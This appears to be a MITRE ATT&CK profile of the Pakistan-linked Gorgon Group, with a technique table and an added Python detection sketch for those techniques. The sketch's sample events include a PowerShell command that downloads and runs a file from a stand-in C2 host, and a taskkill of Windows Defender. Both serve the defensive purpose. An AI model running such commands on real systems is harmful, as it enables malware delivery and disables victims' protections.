Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]

ID: G0078
Aliases: Gorgon Group
Version: 1.0

Alias Descriptions

Gorgon Group [1]

Techniques Used

Domain | ID | Name | Use
Enterprise | T1059 | Command-Line Interface | Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system. [1]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file. [1]
Enterprise | T1089 | Disabling Security Tools | Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command. [1]
Enterprise | T1106 | Execution through API | Gorgon Group malware can leverage the Windows API call CreateProcessA() for execution. [1]
Enterprise | T1112 | Modify Registry | Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\. [1]
Enterprise | T1086 | PowerShell | Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim's machine. [1]
Enterprise | T1093 | Process Hollowing | Gorgon Group malware can use process hollowing to inject one of its trojans into another process. [1]
Enterprise | T1055 | Process Injection | Gorgon Group malware can download a remote access tool, NanoCore, and inject it into another process. [1]
Enterprise | T1060 | Registry Run Keys / Startup Folder | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. [1]
Enterprise | T1105 | Remote File Copy | Gorgon Group malware can download additional files from C2 servers. [1]
Enterprise | T1064 | Scripting | Gorgon Group has used macros in spearphishing attachments and has executed VBScripts on victim machines. [1]
Enterprise | T1023 | Shortcut Modification | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. [1]
Enterprise | T1193 | Spearphishing Attachment | Gorgon Group sent emails to victims with malicious Microsoft Office documents attached. [1]
Enterprise | T1065 | Uncommonly Used Port | Gorgon Group has used a variant of NanoCore RAT that communicates with its C2 server over port 6666. [1]
Enterprise | T1204 | User Execution | Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails. [1]
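Several rows above describe host and network behaviour a defender can look for: taskkill against security tooling (T1089), registry changes under HKCU\Software\Microsoft\Office\ (T1112), cmd.exe/PowerShell download-and-execute (T1059/T1086) and NanoCore traffic on port 6666 (T1065). The following detection sketch is an added example, not part of the ATT&CK page or any vendor tool; the event shape, the process watchlist and the VBAWarnings value name are assumptions, and the sample events are constructed.

```python
import re

# Constructed sample events in a simplified Sysmon-like shape (assumed, not real telemetry).
# id 1 = process creation, id 13 = registry value set, id 3 = network connection.
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": "cmd.exe /c taskkill /f /im MSASCui.exe"},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings"},
    {"id": 1, "cmdline": "powershell -w hidden (New-Object Net.WebClient)"
                         ".DownloadFile('http://c2.invalid/p.exe','p.exe'); Start-Process p.exe"},
    {"id": 3, "image": r"C:\Users\u\AppData\Roaming\update.exe", "dst_port": 6666},
    {"id": 1, "cmdline": "notepad.exe notes.txt"},
]

# Assumed watchlist: Defender UI/engine and Office host processes whose termination
# by taskkill matches the T1089 behaviour described in the table.
KILL_WATCHLIST = ("msascui.exe", "msmpeng.exe", "winword.exe", "excel.exe")
TASKKILL = re.compile(r"\btaskkill\b.*?/im\s+(\S+)", re.I)
# Office security settings live below the key path quoted in the T1112 row.
OFFICE_SECURITY_KEY = re.compile(r"^HKCU\\Software\\Microsoft\\Office\\.*\\Security\\", re.I)
# Download followed by execution in one command line (T1059 / T1086).
DOWNLOAD_EXEC = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|certutil).*(start-process|iex|\.exe)", re.I)
C2_PORTS = {6666}  # NanoCore variant port reported in the T1065 row


def classify(event):
    """Return the ATT&CK technique IDs whose heuristic fires on one event."""
    hits = []
    if event["id"] == 1:
        cmd = event.get("cmdline", "")
        m = TASKKILL.search(cmd)
        if m and m.group(1).lower() in KILL_WATCHLIST:
            hits.append("T1089")
        if DOWNLOAD_EXEC.search(cmd):
            hits.append("T1086" if "powershell" in cmd.lower() else "T1059")
    elif event["id"] == 13 and OFFICE_SECURITY_KEY.search(event.get("target", "")):
        hits.append("T1112")
    elif event["id"] == 3 and event.get("dst_port") in C2_PORTS:
        hits.append("T1065")
    return hits


def scan(events):
    """Map event index -> technique hits, keeping only events that matched something."""
    results = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, techniques in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(techniques)}")
```

Each heuristic alone is noisy (administrators also run taskkill and change Office settings); the value is in correlating several of these hits on one host within a short window.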


Software

ID | Name | Techniques
S0262 | QuasarRAT | Code Signing, Command-Line Interface, Connection Proxy, Credential Dumping, Credentials in Files, Input Capture, Masquerading, Modify Registry, Remote Desktop Protocol, Remote File Copy, Scheduled Task, Standard Cryptographic Protocol, System Information Discovery, Video Capture